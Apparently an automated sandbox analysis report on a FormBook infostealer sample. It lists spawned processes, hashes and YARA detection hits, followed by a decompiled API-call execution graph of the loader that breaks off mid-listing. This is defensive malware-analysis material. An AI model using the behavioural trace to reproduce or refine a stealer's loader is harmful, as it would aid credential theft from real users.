                                                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.20405923409.0000000034610000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                Reputation:low
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:10
                                                                                                Start time:06:30:55
                                                                                                Start date:27/05/2024
                                                                                                Path:C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:"C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe"
                                                                                                Imagebase:0xc30000
                                                                                                File size:140'800 bytes
                                                                                                MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                Has elevated privileges:false
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language
                                                                                                Yara matches:
                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.25030471443.00000000005F0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000A.00000002.25030471443.00000000005F0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.25034036659.00000000042F0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000A.00000002.25034036659.00000000042F0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                                                                Reputation:high
                                                                                                Has exited:false

                                                                                                General

                                                                                                Target ID:11
                                                                                                Start time:06:30:57
                                                                                                Start date:27/05/2024
                                                                                                Path:C:\Windows\SysWOW64\write.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:"C:\Windows\SysWOW64\write.exe"
                                                                                                Imagebase:0xa00000
                                                                                                File size:10'240 bytes
                                                                                                MD5 hash:3D6FDBA2878656FA9ECB81F6ECE45703
                                                                                                Has elevated privileges:false
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language
                                                                                                Yara matches:
                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.25033531702.0000000004910000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000B.00000002.25033531702.0000000004910000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.25033303278.00000000048D0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000B.00000002.25033303278.00000000048D0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.25029850755.0000000002AC0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000B.00000002.25029850755.0000000002AC0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                Reputation:moderate
                                                                                                Has exited:false

                                                                                                General

                                                                                                Target ID:12
                                                                                                Start time:06:31:21
                                                                                                Start date:27/05/2024
                                                                                                Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                                Imagebase:0x7ff6ed470000
                                                                                                File size:687'008 bytes
                                                                                                MD5 hash:D1CC73370B9EF7D74E6D9FD9248CD687
                                                                                                Has elevated privileges:false
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:moderate
                                                                                                Has exited:true

                                                                                                Disassembly

                                                                                                Reset < >

                                                                                                  Execution Graph

                                                                                                  Execution Coverage:23.3%
                                                                                                  Dynamic/Decrypted Code Coverage:14.5%
                                                                                                  Signature Coverage:25.6%
                                                                                                  Total number of Nodes:1458
                                                                                                  Total number of Limit Nodes:46
                                                                                                  execution_graph 4704 10001000 4707 1000101b 4704->4707 4714 100014bb 4707->4714 4709 10001020 4710 10001024 4709->4710 4711 10001027 GlobalAlloc 4709->4711 4712 100014e2 3 API calls 4710->4712 4711->4710 4713 10001019 4712->4713 4716 100014c1 4714->4716 4715 100014c7 4715->4709 4716->4715 4717 100014d3 GlobalFree 4716->4717 4717->4709 3629 403a41 3630 403b94 3629->3630 3631 403a59 3629->3631 3633 403be5 3630->3633 3634 403ba5 GetDlgItem GetDlgItem 3630->3634 3631->3630 3632 403a65 3631->3632 3635 403a70 SetWindowPos 3632->3635 3636 403a83 3632->3636 3638 403c3f 3633->3638 3647 401389 2 API calls 3633->3647 3637 403f14 19 API calls 3634->3637 3635->3636 3640 403aa0 3636->3640 3641 403a88 ShowWindow 3636->3641 3642 403bcf SetClassLongA 3637->3642 3643 403b8f 3638->3643 3699 403f60 3638->3699 3644 403ac2 3640->3644 3645 403aa8 DestroyWindow 3640->3645 3641->3640 3646 40140b 2 API calls 3642->3646 3649 403ac7 SetWindowLongA 3644->3649 3650 403ad8 3644->3650 3648 403e9d 3645->3648 3646->3633 3651 403c17 3647->3651 3648->3643 3658 403ece ShowWindow 3648->3658 3649->3643 3655 403b81 3650->3655 3656 403ae4 GetDlgItem 3650->3656 3651->3638 3652 403c1b SendMessageA 3651->3652 3652->3643 3653 40140b 2 API calls 3669 403c51 3653->3669 3654 403e9f DestroyWindow EndDialog 3654->3648 3736 403f7b 3655->3736 3659 403b14 3656->3659 3660 403af7 SendMessageA IsWindowEnabled 3656->3660 3658->3643 3662 403b21 3659->3662 3663 403b68 SendMessageA 3659->3663 3664 403b34 3659->3664 3673 403b19 3659->3673 3660->3643 3660->3659 3662->3663 3662->3673 3663->3655 3666 403b51 3664->3666 3667 403b3c 3664->3667 3671 40140b 2 API calls 3666->3671 3730 40140b 3667->3730 3668 403b4f 3668->3655 3669->3643 3669->3653 3669->3654 3672 403f14 19 API calls 3669->3672 3690 403ddf DestroyWindow 3669->3690 3702 405d51 3669->3702 3720 403f14 3669->3720 3674 403b58 3671->3674 3672->3669 3733 403eed 3673->3733 3674->3655 3674->3673 3676 403ccc GetDlgItem 3677 403ce1 3676->3677 3678 403ce9 ShowWindow KiUserCallbackDispatcher 3676->3678 3677->3678 3723 403f36 KiUserCallbackDispatcher 3678->3723 3680 403d13 EnableWindow 3683 403d27 3680->3683 3681 403d2c GetSystemMenu EnableMenuItem SendMessageA 3682 403d5c SendMessageA 3681->3682 3681->3683 3682->3683 3683->3681 3724 403f49 SendMessageA 3683->3724 3725 405d2f lstrcpynA 3683->3725 3686 403d8a lstrlenA 3687 405d51 18 API calls 3686->3687 3688 403d9b SetWindowTextA 3687->3688 3726 401389 3688->3726 3690->3648 3691 403df9 CreateDialogParamA 3690->3691 3691->3648 3692 403e2c 3691->3692 3693 403f14 19 API calls 3692->3693 3694 403e37 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3693->3694 3695 401389 2 API calls 3694->3695 3696 403e7d 3695->3696 3696->3643 3697 403e85 ShowWindow 3696->3697 3698 403f60 SendMessageA 3697->3698 3698->3648 3700 403f78 3699->3700 3701 403f69 SendMessageA 3699->3701 3700->3669 3701->3700 3715 405d5e 3702->3715 3703 405f81 3704 405f96 3703->3704 3766 405d2f lstrcpynA 3703->3766 3704->3669 3706 405dff GetVersion 3706->3715 3707 405f58 lstrlenA 3707->3715 3710 405d51 10 API calls 3710->3707 3712 405e77 GetSystemDirectoryA 3712->3715 3713 405e8a GetWindowsDirectoryA 3713->3715 3715->3703 3715->3706 3715->3707 3715->3710 3715->3712 3715->3713 3716 405ebe SHGetSpecialFolderLocation 3715->3716 3717 405d51 10 API calls 3715->3717 3718 405f01 lstrcatA 3715->3718 3750 405c16 RegOpenKeyExA 3715->3750 3755 405f9a 3715->3755 3764 405c8d wsprintfA 3715->3764 3765 405d2f lstrcpynA 3715->3765 3716->3715 3719 405ed6 SHGetPathFromIDListA CoTaskMemFree 3716->3719 3717->3715 3718->3715 3719->3715 3721 405d51 18 API calls 3720->3721 3722 403f1f SetDlgItemTextA 3721->3722 3722->3676 3723->3680 3724->3683 3725->3686 3728 401390 3726->3728 3727 4013fe 3727->3669 3728->3727 3729 4013cb MulDiv SendMessageA 3728->3729 3729->3728 3731 401389 2 API calls 3730->3731 3732 401420 3731->3732 3732->3673 3734 403ef4 3733->3734 3735 403efa SendMessageA 3733->3735 3734->3735 3735->3668 3737 403f93 GetWindowLongA 3736->3737 3747 40401c 3736->3747 3738 403fa4 3737->3738 3737->3747 3739 403fb3 GetSysColor 3738->3739 3740 403fb6 3738->3740 3739->3740 3741 403fc6 SetBkMode 3740->3741 3742 403fbc SetTextColor 3740->3742 3743 403fe4 3741->3743 3744 403fde GetSysColor 3741->3744 3742->3741 3745 403ff5 3743->3745 3746 403feb SetBkColor 3743->3746 3744->3743 3745->3747 3748 404008 DeleteObject 3745->3748 3749 40400f CreateBrushIndirect 3745->3749 3746->3745 3747->3643 3748->3749 3749->3747 3751 405c87 3750->3751 3752 405c49 RegQueryValueExA 3750->3752 3751->3715 3753 405c6a RegCloseKey 3752->3753 3753->3751 3761 405fa6 3755->3761 3756 40600e 3757 406012 CharPrevA 3756->3757 3759 40602d 3756->3759 3757->3756 3758 406003 CharNextA 3758->3756 3758->3761 3759->3715 3761->3756 3761->3758 3762 405ff1 CharNextA 3761->3762 3763 405ffe CharNextA 3761->3763 3767 4057cc 3761->3767 3762->3761 3763->3758 3764->3715 3765->3715 3766->3704 3768 4057d2 3767->3768 3769 4057e5 3768->3769 3770 4057d8 CharNextA 3768->3770 3769->3761 3770->3768 4718 401cc2 4719 402a1d 18 API calls 4718->4719 4720 401cd2 SetWindowLongA 4719->4720 4721 4028cf 4720->4721 4722 401a43 4723 402a1d 18 API calls 4722->4723 4724 401a49 4723->4724 4725 402a1d 18 API calls 4724->4725 4726 4019f3 4725->4726 3811 401e44 3812 402a3a 18 API calls 3811->3812 3813 401e4a 3812->3813 3827 404f48 3813->3827 3817 401eb0 CloseHandle 3821 4026a6 3817->3821 3818 401e5a 3818->3817 3819 401e79 WaitForSingleObject 3818->3819 3818->3821 3841 406104 3818->3841 3819->3818 3820 401e87 GetExitCodeProcess 3819->3820 3823 401ea4 3820->3823 3824 401e99 3820->3824 3823->3817 3826 401ea2 3823->3826 3845 405c8d wsprintfA 3824->3845 3826->3817 3828 404f63 3827->3828 3837 401e54 3827->3837 3829 404f80 lstrlenA 3828->3829 3830 405d51 18 API calls 3828->3830 3831 404fa9 3829->3831 3832 404f8e lstrlenA 3829->3832 3830->3829 3834 404fbc 3831->3834 3835 404faf SetWindowTextA 3831->3835 3833 404fa0 lstrcatA 3832->3833 3832->3837 3833->3831 3836 404fc2 SendMessageA SendMessageA SendMessageA 3834->3836 3834->3837 3835->3834 3836->3837 3838 4054c0 CreateProcessA 3837->3838 3839 4054f3 CloseHandle 3838->3839 3840 4054ff 3838->3840 3839->3840 3840->3818 3842 406121 PeekMessageA 3841->3842 3843 406131 3842->3843 3844 406117 DispatchMessageA 3842->3844 3843->3819 3844->3842 3845->3826 4727 402644 4728 40264a 4727->4728 4729 402652 FindClose 4728->4729 4730 4028cf 4728->4730 4729->4730 4731 4048c5 GetDlgItem GetDlgItem 4732 404917 7 API calls 4731->4732 4739 404b2f 4731->4739 4733 4049ba DeleteObject 4732->4733 4734 4049ad SendMessageA 4732->4734 4735 4049c3 4733->4735 4734->4733 4736 4049fa 4735->4736 4738 405d51 18 API calls 4735->4738 4740 403f14 19 API calls 4736->4740 4737 404c13 4741 404cbf 4737->4741 4752 404c6c SendMessageA 4737->4752 4772 404b22 4737->4772 4743 4049dc SendMessageA SendMessageA 4738->4743 4739->4737 4742 404ba0 4739->4742 4784 404813 SendMessageA 4739->4784 4746 404a0e 4740->4746 4744 404cd1 4741->4744 4745 404cc9 SendMessageA 4741->4745 4742->4737 4748 404c05 SendMessageA 4742->4748 4743->4735 4749 404cfa 4744->4749 4754 404ce3 ImageList_Destroy 4744->4754 4755 404cea 4744->4755 4745->4744 4751 403f14 19 API calls 4746->4751 4747 403f7b 8 API calls 4753 404eb5 4747->4753 4748->4737 4757 404e69 4749->4757 4778 404d35 4749->4778 4789 404893 4749->4789 4756 404a1c 4751->4756 4758 404c81 SendMessageA 4752->4758 4752->4772 4754->4755 4755->4749 4759 404cf3 GlobalFree 4755->4759 4760 404af0 GetWindowLongA SetWindowLongA 4756->4760 4767 404aea 4756->4767 4770 404a6b SendMessageA 4756->4770 4773 404aa7 SendMessageA 4756->4773 4774 404ab8 SendMessageA 4756->4774 4762 404e7b ShowWindow GetDlgItem ShowWindow 4757->4762 4757->4772 4765 404c94 4758->4765 4759->4749 4761 404b09 4760->4761 4763 404b27 4761->4763 4764 404b0f ShowWindow 4761->4764 4762->4772 4783 403f49 SendMessageA 4763->4783 4782 403f49 SendMessageA 4764->4782 4766 404ca5 SendMessageA 4765->4766 4766->4741 4767->4760 4767->4761 4770->4756 4772->4747 4773->4756 4774->4756 4775 404e3f InvalidateRect 4775->4757 4776 404e55 4775->4776 4798 4047ce 4776->4798 4777 404d63 SendMessageA 4781 404d79 4777->4781 4778->4777 4778->4781 4780 404ded SendMessageA SendMessageA 4780->4781 4781->4775 4781->4780 4782->4772 4783->4739 4785 404872 SendMessageA 4784->4785 4786 404836 GetMessagePos ScreenToClient SendMessageA 4784->4786 4787 40486a 4785->4787 4786->4787 4788 40486f 4786->4788 4787->4742 4788->4785 4801 405d2f lstrcpynA 4789->4801 4791 4048a6 4802 405c8d wsprintfA 4791->4802 4793 4048b0 4794 40140b 2 API calls 4793->4794 4795 4048b9 4794->4795 4803 405d2f lstrcpynA 4795->4803 4797 4048c0 4797->4778 4804 404709 4798->4804 4800 4047e3 4800->4757 4801->4791 4802->4793 4803->4797 4805 40471f 4804->4805 4806 405d51 18 API calls 4805->4806 4807 404783 4806->4807 4808 405d51 18 API calls 4807->4808 4809 40478e 4808->4809 4810 405d51 18 API calls 4809->4810 4811 4047a4 lstrlenA wsprintfA SetDlgItemTextA 4810->4811 4811->4800 4812 4026c6 4813 402a3a 18 API calls 4812->4813 4814 4026d4 4813->4814 4815 4026ea 4814->4815 4816 402a3a 18 API calls 4814->4816 4817 40597d 2 API calls 4815->4817 4816->4815 4818 4026f0 4817->4818 4840 4059a2 GetFileAttributesA CreateFileA 4818->4840 4820 4026fd 4821 4027a0 4820->4821 4822 402709 GlobalAlloc 4820->4822 4825 4027a8 DeleteFileA 4821->4825 4826 4027bb 4821->4826 4823 402722 4822->4823 4824 402797 CloseHandle 4822->4824 4841 4030c7 SetFilePointer 4823->4841 4824->4821 4825->4826 4828 402728 4829 4030b1 ReadFile 4828->4829 4830 402731 GlobalAlloc 4829->4830 4831 402741 4830->4831 4832 402775 4830->4832 4833 402e9f 32 API calls 4831->4833 4834 405a49 WriteFile 4832->4834 4839 40274e 4833->4839 4835 402781 GlobalFree 4834->4835 4836 402e9f 32 API calls 4835->4836 4837 402794 4836->4837 4837->4824 4838 40276c GlobalFree 4838->4832 4839->4838 4840->4820 4841->4828 3902 4022c7 3903 402a3a 18 API calls 3902->3903 3904 4022d8 3903->3904 3905 402a3a 18 API calls 3904->3905 3906 4022e1 3905->3906 3907 402a3a 18 API calls 3906->3907 3908 4022eb GetPrivateProfileStringA 3907->3908 4842 402847 4843 402a1d 18 API calls 4842->4843 4844 40284d 4843->4844 4845 40287e 4844->4845 4846 40285b 4844->4846 4849 4026a6 4844->4849 4847 405d51 18 API calls 4845->4847 4845->4849 4846->4849 4850 405c8d wsprintfA 4846->4850 4847->4849 4850->4849 3951 401bca 3952 402a1d 18 API calls 3951->3952 3953 401bd1 3952->3953 3954 402a1d 18 API calls 3953->3954 3955 401bdb 3954->3955 3956 402a3a 18 API calls 3955->3956 3960 401beb 3955->3960 3956->3960 3957 402a3a 18 API calls 3961 401bfb 3957->3961 3958 401c06 3962 402a1d 18 API calls 3958->3962 3959 401c4a 3963 402a3a 18 API calls 3959->3963 3960->3957 3960->3961 3961->3958 3961->3959 3964 401c0b 3962->3964 3965 401c4f 3963->3965 3966 402a1d 18 API calls 3964->3966 3967 402a3a 18 API calls 3965->3967 3968 401c14 3966->3968 3969 401c58 FindWindowExA 3967->3969 3970 401c3a SendMessageA 3968->3970 3971 401c1c SendMessageTimeoutA 3968->3971 3972 401c76 3969->3972 3970->3972 3971->3972 3973 1000270b 3974 1000275b 3973->3974 3975 1000271b VirtualProtect 3973->3975 3975->3974 4854 1000180d 4855 10001830 4854->4855 4856 10001860 GlobalFree 4855->4856 4857 10001872 4855->4857 4856->4857 4858 10001266 2 API calls 4857->4858 4859 100019e3 GlobalFree GlobalFree 4858->4859 4566 401751 4567 402a3a 18 API calls 4566->4567 4568 401758 4567->4568 4569 401776 4568->4569 4570 40177e 4568->4570 4605 405d2f lstrcpynA 4569->4605 4606 405d2f lstrcpynA 4570->4606 4573 401789 4575 4057a1 3 API calls 4573->4575 4574 40177c 4577 405f9a 5 API calls 4574->4577 4576 40178f lstrcatA 4575->4576 4576->4574 4598 40179b 4577->4598 4578 406033 2 API calls 4578->4598 4580 40597d 2 API calls 4580->4598 4581 4017b2 CompareFileTime 4581->4598 4582 401876 4583 404f48 25 API calls 4582->4583 4586 401880 4583->4586 4584 404f48 25 API calls 4592 401862 4584->4592 4585 405d2f lstrcpynA 4585->4598 4587 402e9f 32 API calls 4586->4587 4588 401893 4587->4588 4589 4018a7 SetFileTime 4588->4589 4591 4018b9 CloseHandle 4588->4591 4589->4591 4590 405d51 18 API calls 4590->4598 4591->4592 4593 4018ca 4591->4593 4594 4018e2 4593->4594 4595 4018cf 4593->4595 4597 405d51 18 API calls 4594->4597 4596 405d51 18 API calls 4595->4596 4599 4018d7 lstrcatA 4596->4599 4600 4018ea 4597->4600 4598->4578 4598->4580 4598->4581 4598->4582 4598->4585 4598->4590 4601 405525 MessageBoxIndirectA 4598->4601 4603 40184d 4598->4603 4604 4059a2 GetFileAttributesA CreateFileA 4598->4604 4599->4600 4600->4592 4602 405525 MessageBoxIndirectA 4600->4602 4601->4598 4602->4592 4603->4584 4603->4592 4604->4598 4605->4574 4606->4573 4860 401651 4861 402a3a 18 API calls 4860->4861 4862 401657 4861->4862 4863 406033 2 API calls 4862->4863 4864 40165d 4863->4864 4865 401951 4866 402a1d 18 API calls 4865->4866 4867 401958 4866->4867 4868 402a1d 18 API calls 4867->4868 4869 401962 4868->4869 4870 402a3a 18 API calls 4869->4870 4871 40196b 4870->4871 4872 40197e lstrlenA 4871->4872 4873 4019b9 4871->4873 4874 401988 4872->4874 4874->4873 4878 405d2f lstrcpynA 4874->4878 4876 4019a2 4876->4873 4877 4019af lstrlenA 4876->4877 4877->4873 4878->4876 4879 404352 4880 40437e 4879->4880 4881 40438f 4879->4881 4940 405509 GetDlgItemTextA 4880->4940 4882 40439b GetDlgItem 4881->4882 4889 4043fa 4881->4889 4884 4043af 4882->4884 4888 4043c3 SetWindowTextA 4884->4888 4893 40583a 4 API calls 4884->4893 4885 4044de 4890 404688 4885->4890 4942 405509 GetDlgItemTextA 4885->4942 4886 404389 4887 405f9a 5 API calls 4886->4887 4887->4881 4894 403f14 19 API calls 4888->4894 4889->4885 4889->4890 4895 405d51 18 API calls 4889->4895 4892 403f7b 8 API calls 4890->4892 4897 40469c 4892->4897 4898 4043b9 4893->4898 4899 4043df 4894->4899 4900 40446e SHBrowseForFolderA 4895->4900 4896 40450e 4901 40588f 18 API calls 4896->4901 4898->4888 4905 4057a1 3 API calls 4898->4905 4902 403f14 19 API calls 4899->4902 4900->4885 4903 404486 CoTaskMemFree 4900->4903 4904 404514 4901->4904 4906 4043ed 4902->4906 4907 4057a1 3 API calls 4903->4907 4943 405d2f lstrcpynA 4904->4943 4905->4888 4941 403f49 SendMessageA 4906->4941 4909 404493 4907->4909 4912 4044ca SetDlgItemTextA 4909->4912 4916 405d51 18 API calls 4909->4916 4911 4043f3 4915 4060c8 5 API calls 4911->4915 4912->4885 4913 40452b 4914 4060c8 5 API calls 4913->4914 4922 404532 4914->4922 4915->4889 4917 4044b2 lstrcmpiA 4916->4917 4917->4912 4919 4044c3 lstrcatA 4917->4919 4918 40456e 4944 405d2f lstrcpynA 4918->4944 4919->4912 4921 404575 4923 40583a 4 API calls 4921->4923 4922->4918 4927 4057e8 2 API calls 4922->4927 4928 4045c6 4922->4928 4924 40457b GetDiskFreeSpaceA 4923->4924 4926 40459f MulDiv 4924->4926 4924->4928 4926->4928 4927->4922 4929 404637 4928->4929 4931 4047ce 21 API calls 4928->4931 4930 40465a 4929->4930 4932 40140b 2 API calls 4929->4932 4945 403f36 KiUserCallbackDispatcher 4930->4945 4933 404624 4931->4933 4932->4930 4934 404639 SetDlgItemTextA 4933->4934 4935 404629 4933->4935 4934->4929 4937 404709 21 API calls 4935->4937 4937->4929 4938 404676 4938->4890 4946 4042e7 4938->4946 4940->4886 4941->4911 4942->4896 4943->4913 4944->4921 4945->4938 4947 4042f5 4946->4947 4948 4042fa SendMessageA 4946->4948 4947->4948 4948->4890 4949 4019d2 4950 402a3a 18 API calls 4949->4950 4951 4019d9 4950->4951 4952 402a3a 18 API calls 4951->4952 4953 4019e2 4952->4953 4954 4019e9 lstrcmpiA 4953->4954 4955 4019fb lstrcmpA 4953->4955 4956 4019ef 4954->4956 4955->4956 4957 4021d2 4958 402a3a 18 API calls 4957->4958 4959 4021d8 4958->4959 4960 402a3a 18 API calls 4959->4960 4961 4021e1 4960->4961 4962 402a3a 18 API calls 4961->4962 4963 4021ea 4962->4963 4964 406033 2 API calls 4963->4964 4965 4021f3 4964->4965 4966 402204 lstrlenA lstrlenA 4965->4966 4970 4021f7 4965->4970 4968 404f48 25 API calls 4966->4968 4967 404f48 25 API calls 4971 4021ff 4967->4971 4969 402240 SHFileOperationA 4968->4969 4969->4970 4969->4971 4970->4967 4970->4971 4611 4014d6 4612 402a1d 18 API calls 4611->4612 4613 4014dc Sleep 4612->4613 4615 4028cf 4613->4615 4972 1000161a 4973 10001649 4972->4973 4974 10001a5d 18 API calls 4973->4974 4975 10001650 4974->4975 4976 10001663 4975->4976 4977 10001657 4975->4977 4979 1000168a 4976->4979 4980 1000166d 4976->4980 4978 10001266 2 API calls 4977->4978 4983 10001661 4978->4983 4981 10001690 4979->4981 4982 100016b4 4979->4982 4984 100014e2 3 API calls 4980->4984 4985 10001559 3 API calls 4981->4985 4986 100014e2 3 API calls 4982->4986 4987 10001672 4984->4987 4988 10001695 4985->4988 4986->4983 4989 10001559 3 API calls 4987->4989 4990 10001266 2 API calls 4988->4990 4991 10001678 4989->4991 4992 1000169b GlobalFree 4990->4992 4993 10001266 2 API calls 4991->4993 4992->4983 4995 100016af GlobalFree 4992->4995 4994 1000167e GlobalFree 4993->4994 4994->4983 4995->4983 4620 40155b 4621 401577 ShowWindow 4620->4621 4622 40157e 4620->4622 4621->4622 4623 40158c ShowWindow 4622->4623 4624 4028cf 4622->4624 4623->4624 4996 40255c 4997 402a1d 18 API calls 4996->4997 5002 402566 4997->5002 4998 4025d0 4999 405a1a ReadFile 4999->5002 5000 4025d2 5005 405c8d wsprintfA 5000->5005 5001 4025e2 5001->4998 5004 4025f8 SetFilePointer 5001->5004 5002->4998 5002->4999 5002->5000 5002->5001 5004->4998 5005->4998 5006 40405d 5007 404073 5006->5007 5008 40417f 5006->5008 5011 403f14 19 API calls 5007->5011 5009 4041ee 5008->5009 5014 4042c2 5008->5014 5018 4041c3 GetDlgItem SendMessageA 5008->5018 5010 4041f8 GetDlgItem 5009->5010 5009->5014 5013 40420e 5010->5013 5017 404280 5010->5017 5012 4040c9 5011->5012 5016 403f14 19 API calls 5012->5016 5013->5017 5021 404234 6 API calls 5013->5021 5015 403f7b 8 API calls 5014->5015 5019 4042bd 5015->5019 5020 4040d6 CheckDlgButton 5016->5020 5017->5014 5022 404292 5017->5022 5037 403f36 KiUserCallbackDispatcher 5018->5037 5035 403f36 KiUserCallbackDispatcher 5020->5035 5021->5017 5025 404298 SendMessageA 5022->5025 5026 4042a9 5022->5026 5025->5026 5026->5019 5030 4042af SendMessageA 5026->5030 5027 4041e9 5028 4042e7 SendMessageA 5027->5028 5028->5009 5029 4040f4 GetDlgItem 5036 403f49 SendMessageA 5029->5036 5030->5019 5032 40410a SendMessageA 5033 404131 SendMessageA SendMessageA lstrlenA SendMessageA SendMessageA 5032->5033 5034 404128 GetSysColor 5032->5034 5033->5019 5034->5033 5035->5029 5036->5032 5037->5027 4625 40205e 4626 402a3a 18 API calls 4625->4626 4627 402065 4626->4627 4628 402a3a 18 API calls 4627->4628 4629 40206f 4628->4629 4630 402a3a 18 API calls 4629->4630 4631 402079 4630->4631 4632 402a3a 18 API calls 4631->4632 4633 402083 4632->4633 4634 402a3a 18 API calls 4633->4634 4635 40208d 4634->4635 4636 4020cc CoCreateInstance 4635->4636 4637 402a3a 18 API calls 4635->4637 4640 4020eb 4636->4640 4642 402193 4636->4642 4637->4636 4638 401423 25 API calls 4639 4021c9 4638->4639 4641 402173 MultiByteToWideChar 4640->4641 4640->4642 4641->4642 4642->4638 4642->4639 5038 40265e 5039 402664 5038->5039 5040 402668 FindNextFileA 5039->5040 5043 40267a 5039->5043 5041 4026b9 5040->5041 5040->5043 5044 405d2f lstrcpynA 5041->5044 5044->5043 5045 401cde GetDlgItem GetClientRect 5046 402a3a 18 API calls 5045->5046 5047 401d0e LoadImageA SendMessageA 5046->5047 5048 401d2c DeleteObject 5047->5048 5049 4028cf 5047->5049 5048->5049 5050 401662 5051 402a3a 18 API calls 5050->5051 5052 401669 5051->5052 5053 402a3a 18 API calls 5052->5053 5054 401672 5053->5054 5055 402a3a 18 API calls 5054->5055 5056 40167b MoveFileA 5055->5056 5057 40168e 5056->5057 5063 401687 5056->5063 5059 406033 2 API calls 5057->5059 5061 4021c9 5057->5061 5058 401423 25 API calls 5058->5061 5060 40169d 5059->5060 5060->5061 5062 405bea 38 API calls 5060->5062 5062->5063 5063->5058 4643 402364 4644 40236a 4643->4644 4645 402a3a 18 API calls 4644->4645 4646 40237c 4645->4646 4647 402a3a 18 API calls 4646->4647 4648 402386 RegCreateKeyExA 4647->4648 4649 4026a6 4648->4649 4651 4023b0 4648->4651 4650 4023c8 4653 4023d4 4650->4653 4655 402a1d 18 API calls 4650->4655 4651->4650 4652 402a3a 18 API calls 4651->4652 4654 4023c1 lstrlenA 4652->4654 4656 4023ef RegSetValueExA 4653->4656 4657 402e9f 32 API calls 4653->4657 4654->4650 4655->4653 4658 402405 RegCloseKey 4656->4658 4657->4656 4658->4649 4660 401dea 4661 402a3a 18 API calls 4660->4661 4662 401df0 4661->4662 4663 402a3a 18 API calls 4662->4663 4664 401df9 4663->4664 4665 402a3a 18 API calls 4664->4665 4666 401e02 4665->4666 4667 402a3a 18 API calls 4666->4667 4668 401e0b 4667->4668 4669 401423 25 API calls 4668->4669 4670 401e12 ShellExecuteA 4669->4670 4671 401e3f 4670->4671 5064 40366d 5065 403678 5064->5065 5066 40367c 5065->5066 5067 40367f GlobalAlloc 5065->5067 5067->5066 5068 401eee 5069 402a3a 18 API calls 5068->5069 5070 401ef5 5069->5070 5071 4060c8 5 API calls 5070->5071 5072 401f04 5071->5072 5073 401f1c GlobalAlloc 5072->5073 5074 401f84 5072->5074 5073->5074 5075 401f30 5073->5075 5076 4060c8 5 API calls 5075->5076 5077 401f37 5076->5077 5078 4060c8 5 API calls 5077->5078 5079 401f41 5078->5079 5079->5074 5083 405c8d wsprintfA 5079->5083 5081 401f78 5084 405c8d wsprintfA 5081->5084 5083->5081 5084->5074 5085 4014f0 SetForegroundWindow 5086 4028cf 5085->5086 5087 100015b3 5088 100014bb GlobalFree 5087->5088 5089 100015cb 5088->5089 5090 10001611 GlobalFree 5089->5090 5091 100015e6 5089->5091 5092 100015fd VirtualFree 5089->5092 5091->5090 5092->5090 5098 4018f5 5099 40192c 5098->5099 5100 402a3a 18 API calls 5099->5100 5101 401931 5100->5101 5102 4055d1 69 API calls 5101->5102 5103 40193a 5102->5103 5104 4024f7 5105 402a3a 18 API calls 5104->5105 5106 4024fe 5105->5106 5109 4059a2 GetFileAttributesA CreateFileA 5106->5109 5108 40250a 5109->5108 5110 4018f8 5111 402a3a 18 API calls 5110->5111 5112 4018ff 5111->5112 5113 405525 MessageBoxIndirectA 5112->5113 5114 401908 5113->5114 5115 1000103d 5116 1000101b 5 API calls 5115->5116 5117 10001056 5116->5117 5118 4014fe 5119 401506 5118->5119 5121 401519 5118->5121 5120 402a1d 18 API calls 5119->5120 5120->5121 5122 402b7f 5123 402ba7 5122->5123 5124 402b8e SetTimer 5122->5124 5125 402bfc 5123->5125 5126 402bc1 MulDiv wsprintfA SetWindowTextA SetDlgItemTextA 5123->5126 5124->5123 5126->5125 5127 401000 5128 401037 BeginPaint GetClientRect 5127->5128 5129 40100c DefWindowProcA 5127->5129 5130 4010f3 5128->5130 5132 401179 5129->5132 5133 401073 CreateBrushIndirect FillRect DeleteObject 5130->5133 5134 4010fc 5130->5134 5133->5130 5135 401102 CreateFontIndirectA 5134->5135 5136 401167 EndPaint 5134->5136 5135->5136 5137 401112 6 API calls 5135->5137 5136->5132 5137->5136 3771 402482 3782 402b44 3771->3782 3773 40248c 3786 402a1d 3773->3786 3775 